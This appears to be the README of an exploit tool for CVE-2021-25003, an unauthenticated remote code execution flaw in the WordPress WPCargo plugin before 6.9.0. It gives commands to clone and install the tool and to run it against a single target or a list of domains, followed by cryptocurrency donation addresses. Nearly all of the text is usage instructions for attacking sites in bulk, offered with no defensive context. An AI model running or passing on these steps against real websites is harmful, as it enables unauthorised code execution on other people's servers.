Title: WPCargo < 6.9.0 - Unauthenticated RCE
Author: Krzysztof Zając [ https://kazet.cc/ ]
CVE: CVE-2021-25003
git clone https://github.com/biulove0x/CVE-2021-25003.git
cd CVE-2021-25003/
python3 -m pip install -r requirements.txt
$ python3 WpCargo.py --help
############################################
# @author : biulove0x #
# @name : WP Plugins WPCargo Exploiter #
# @cve : CVE-2021-25003 #
############################################
usage: exploit.py [-h] [-t example.com] [-l target.txt]
CVE-2021-25003 [ WPCargo < 6.9.0 - Unauthenticated RCE ]
optional arguments:
-h, --help show this help message and exit
-t example.com Single target
-l target.txt Multiple target
$ python3 WPCargo.py -t http://example.com/
$ cat domains.txt
http://example.com/
https://examples.com/
$ python3 WPCargo.py -l target.txt
BTC : bc1qst09sxcnq97a4wgsqvpkg4fxyjczvs3xe7278h
BNB : bnb1jhp2hv9utr8u97387p35fmftgr8wpjp39altz0